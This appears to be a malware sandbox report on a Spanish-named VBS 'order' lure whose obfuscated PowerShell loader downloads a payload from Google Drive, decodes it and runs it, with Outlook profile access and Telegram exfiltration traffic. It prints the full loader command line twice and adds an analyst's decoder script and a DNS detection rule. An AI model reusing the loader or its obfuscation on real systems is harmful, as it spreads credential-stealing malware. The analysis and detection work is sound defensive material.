Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. 
Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe 
UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK 
Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. 
Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe 
UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK 
Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
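The PowerShell command line above is GuLoader-style string scrambling: every readable string is produced by the function Tmema, which walks its argument from index 5 in steps of 6 (five junk characters, then one real character) and stops one character short of the end, so the trailing padding chunk is discarded. Eftertragtelsen is `& ($Geeing) ($Hopperne)`, and the literal assigned to $Geeing decodes to `iex`, so each `Eftertragtelsen (Tmema '...')` is simply Invoke-Expression on a decoded string. The dropped-file name is visible in clear (`$Studenterhavrens='\Realiaernes60.Svo'`) and matches C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo in the Files section; `$whiterider=322484;$Vaaset=30962` are the offset and length of the substring that is executed last. The decoder below is added analysis tooling, not code from the sample or from the sandbox. It is fed four literals copied intact from the command line; note that the page's text has collapsed runs of spaces inside some of the longer literals (the User-Agent and the download URL), so those do not decode cleanly from this copy and must be taken from the original script.

```python
"""
Decoder for the Tmema string-scrambling scheme used by the PowerShell loader
in this report.  Added analysis tooling, not code from the sample.

Tmema reads index 5, 11, 17, ... while index < len - 1.  The "- 1" comes from
$Overgesticulatively, which is incremented once per call (it is function-local)
and only when $host.UI is non-null, which is true in any normal PowerShell host.
"""
import re

STEP = 6
FIRST = 5


def decode_tmema(literal: str, host_ui_present: bool = True) -> str:
    """Reproduce Tmema: every 6th character starting at index 5.

    With host_ui_present (the normal case) the upper bound is len-1, so the
    final padding chunk (a space) is dropped.  Without a host UI the bound is
    len and every decoded string gains a trailing space; that is all the
    $Tmmerhandlers173 check changes.
    """
    upper = len(literal) - (1 if host_ui_present else 0)
    return literal[FIRST:upper:STEP]


# Matches each   Tmema '...'   call; the scrambled literals never contain a quote.
TMEMA_CALL = re.compile(r"Tmema\s+'([^']*)'")


def decode_all(cmdline: str) -> list[str]:
    """Decode every Tmema literal in a captured command line, in order."""
    return [decode_tmema(m.group(1)) for m in TMEMA_CALL.finditer(cmdline)]


# Literals copied intact from the command line in this report (these four
# contain no collapsed whitespace, unlike some of the longer ones).
SAMPLE_CMDLINE = (
    "$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';"
    "$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';"
    "$Datauheldenes=Tmema 'Priv >Fav t ';"
    "$Geeing=Tmema ' Cavai LepteAn ekx V ge ';"
)

if __name__ == "__main__":
    # Expected: 'Mozilla/', 'USER-AGENT', '>', 'iex'
    for clear in decode_all(SAMPLE_CMDLINE):
        print(repr(clear))
```

Running this over a full, unmangled copy of the command line recovers the `[Net.ServicePointManager]::SecurityProtocol` setting, the `DownloadFile` call to the Google Drive URL held in `$Diskettefejlenes` (consistent with the drive.google.com and drive.usercontent.google.com connections in the Network section), the Base64 decode of the dropped file and the `substring($whiterider,$Vaaset)` that yields the stage executed by the final `Eftertragtelsen $Temadagenes`.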

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp
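The table shows the recon-then-exfiltration sequence that the VIPKeylogger tag rests on: the host resolves an external-IP service (checkip.dyndns.org), a geolocation service (reallyfreegeoip.org) and then api.telegram.org, all within a short window after the Google Drive download. The correlation rule below is added detection logic, not part of the sandbox report; the DNS log format, host names and timestamps are constructed for the example, and the five-minute window is an assumption.

```python
"""
Correlation rule for the recon-then-exfil DNS pattern seen in this report:
an IP-check lookup followed within a few minutes by api.telegram.org from the
same host.  Added detection logic; log format and hosts are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Domains the sample resolved, grouped by what they give the operator.
IP_CHECK = {"checkip.dyndns.org", "reallyfreegeoip.org"}
EXFIL = {"api.telegram.org"}
WINDOW = timedelta(minutes=5)  # assumption; tune to the environment


def parse_dns_log(lines):
    """Yield (timestamp, host, qname) from constructed 'ts host qname' rows."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, host, qname = line.split()
        yield (datetime.fromisoformat(ts.replace("Z", "+00:00")),
               host, qname.lower().rstrip("."))


def find_recon_exfil(lines, window=WINDOW):
    """Return one alert per host that hit an IP-check service and then
    api.telegram.org within `window`.

    Alert tuple: (host, first_ip_check_time, telegram_time, ip_check_domains).
    """
    events = defaultdict(list)
    for ts, host, qname in parse_dns_log(lines):
        events[host].append((ts, qname))
    alerts = []
    for host, evs in events.items():
        evs.sort()
        checks = [(ts, q) for ts, q in evs if q in IP_CHECK]
        for ts_tg in (ts for ts, q in evs if q in EXFIL):
            hits = [(ts, q) for ts, q in checks
                    if ts <= ts_tg and ts_tg - ts <= window]
            if hits:
                alerts.append((host, hits[0][0], ts_tg,
                               sorted({q for _, q in hits})))
                break  # one alert per host is enough
    return alerts


# Constructed sample: WS01 reproduces the report's sequence; WS02 only visited
# an IP-check page and reached Telegram 48 minutes later; WS03 uses Telegram
# without any preceding recon lookup.
SAMPLE_LOG = """
# ts host qname
2024-10-22T16:41:10Z WS01 drive.google.com
2024-10-22T16:41:11Z WS01 drive.usercontent.google.com
2024-10-22T16:41:30Z WS01 checkip.dyndns.org
2024-10-22T16:41:31Z WS01 reallyfreegeoip.org
2024-10-22T16:41:33Z WS01 api.telegram.org
2024-10-22T16:42:00Z WS02 checkip.dyndns.org
2024-10-22T16:42:05Z WS03 api.telegram.org
2024-10-22T17:30:00Z WS02 api.telegram.org
""".splitlines()

if __name__ == "__main__":
    for host, t0, t1, seen in find_recon_exfil(SAMPLE_LOG):
        print(f"{host}: {', '.join(seen)} at {t0:%H:%M:%S}, "
              f"api.telegram.org at {t1:%H:%M:%S}")
```

Only WS01 fires: the rule requires the IP-check lookup to precede the Telegram request inside the window, so a lone IP-check visit or ordinary Telegram desktop traffic does not alert on its own. In a real deployment, joining in the originating process (powershell.exe or msiexec.exe rather than a browser) removes most of the remaining false positives.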

Files

memory/2136-0-0x00007FFB9FBC3000-0x00007FFB9FBC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j0f0owhf.vrr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2136-10-0x00000291E00D0000-0x00000291E00F2000-memory.dmp

memory/2136-11-0x00007FFB9FBC0000-0x00007FFBA0681000-memory.dmp

memory/2136-12-0x00007FFB9FBC0000-0x00007FFBA0681000-memory.dmp

memory/2136-15-0x00007FFB9FBC3000-0x00007FFB9FBC5000-memory.dmp

memory/2136-16-0x00007FFB9FBC0000-0x00007FFBA0681000-memory.dmp

memory/2136-19-0x00007FFB9FBC0000-0x00007FFBA0681000-memory.dmp

memory/368-20-0x0000000004DC0000-0x0000000004DF6000-memory.dmp

memory/368-21-0x0000000005510000-0x0000000005B38000-memory.dmp

memory/368-22-0x0000000005440000-0x0000000005462000-memory.dmp

memory/368-23-0x0000000005B40000-0x0000000005BA6000-memory.dmp

